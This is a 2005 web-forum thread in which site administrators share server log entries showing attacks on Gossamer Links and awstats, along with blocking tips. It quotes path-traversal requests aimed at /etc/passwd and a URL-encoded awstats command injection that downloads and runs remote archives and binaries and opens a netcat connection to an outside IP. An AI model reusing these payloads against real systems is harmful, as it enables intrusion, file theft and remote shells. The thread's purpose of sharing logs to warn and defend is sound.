Gossamer Forum
Home : Products : Gossamer Links : Discussions :

Someone Trying to Use Links to Hack Sites

Quote Reply
Someone Trying to Use Links to Hack Sites
Just noticed this in my logs:

[Sat May 7 10:49:08 2005] [error] Invalid SiteHTML method: 'site_html_../../../../../../../../../../../../etc/passwd'. at /hd2/web/b/bcdb/public_html/bcdb/admin/Links/SiteHTML.pm line 280.\n [Sat May 7 10:49:11 2005] [error] Invalid SiteHTML method: 'site_html_../../../../../../../../../../../../etc/passwd'. at /hd2/web/b/bcdb/public_html/bcdb/admin/Links/SiteHTML.pm line 280.\n [Sat May 7 10:49:12 2005] [error] Invalid SiteHTML method: 'site_html_../../../../../../../../../../../../etc/passwd'. at /hd2/web/b/bcdb/public_html/bcdb/admin/Links/SiteHTML.pm line 280.\n [Sat May 7 10:49:17 2005] [error] Invalid SiteHTML method: 'site_html_/../../../../../../../../../../../../etc/passwd'. at /hd2/web/b/bcdb/public_html/bcdb/admin/Links/SiteHTML.pm line 280.\ Looks like someone trying to use Links to hack a site. Just thought I'd give you all a heads up.
dave

Big Cartoon DataBase
Big Comic Book DataBase
Quote Reply
Re: [carfac] Someone Trying to Use Links to Hack Sites In reply to
LOL.. .they won't get very far <G> The site_html_... routines are compiled, and thus would give an error, even if there was a .htaccess file in the templates folder.

Personally, I'd just write a simple routine to block these (although it may use more CPU power);

<%if page eq ".htaccess"%>
OH DEAR!!!!
<%else%>
..
<%endif%>

Cheers

Andy (mod)
andy@ultranerds.co.uk
Want to give me something back for my help? Please see my Amazon Wish List
GLinks ULTRA Package | GLinks ULTRA Package PRO
Links SQL Plugins | Website Design and SEO | UltraNerds | ULTRAGLobals Plugin | Pre-Made Template Sets | FREE GLinks Plugins!
Quote Reply
Re: [carfac] Someone Trying to Use Links to Hack Sites In reply to
Chek mod_security
You would need to be selective with the rules you deploy.
I get a lot of these, though they don't get very far:

66.221.200.58 - - "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20ra-ducu.go.ro%2fb.tgz%3btar%20xzvf%20b.tgz%3bcd%20b%3b.%2fstart%3bcd%20..%3brm%20-rf%20b.tgz%3brm%20-rf%20b%3bwget%20ra-ducu.go.ro%2fnc%3bchmod%20%2bx%20nc%3b.%2fnc%2066.221.209.161%2065000%3bwget%20excalibur.go.ro%2ffirewall%3bchmod%20%2bx%20firewall%3b.%2ffirewall%3bhistory%20-c%20%7c%20 HTTP/1.1" 406 352 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "-" "-"

Thanks
HyTC
==================================
Mail Me If Contacting Privately Is That Necessary.
==================================
Quote Reply
Re: [HyperTherm] Someone Trying to Use Links to Hack Sites In reply to
I use a HIGHLY secret process. Among other things, when there is a request for something that a normal user would never ask for, the IP is noted in a text file. A mod_perl routine will deny access to any IP in that file. Really efficient, and works like a charm. The denies work across the whole server (if you want), so it only takes the first hit to protect the rest of the server.

PM me if you want info, I am happy to share this.
dave

Big Cartoon DataBase
Big Comic Book DataBase